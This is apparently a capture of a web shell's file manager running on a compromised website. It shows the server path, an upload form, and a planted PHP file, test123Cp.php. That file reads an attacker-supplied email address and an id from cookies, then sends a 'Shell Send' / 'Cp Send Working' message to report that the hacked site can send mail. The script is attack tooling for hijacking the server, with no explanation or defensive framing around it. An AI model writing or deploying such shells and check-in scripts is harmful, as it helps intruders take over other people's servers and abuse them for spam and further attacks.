Your IP : 216.73.217.33


Current Path : /home/jjexpress/www/
Upload File :
Current File : /home/jjexpress/www/test123Cp.php

<?php $s = "false";if (mail($_COOKIE["email_send_id"],"Shell Send #".$_COOKIE["it_id"],"Cp Send Working .. #".$_COOKIE["it_id"]."\nHash: ".md5(time().uniqid()))) {$s = "true";}echo $s;?>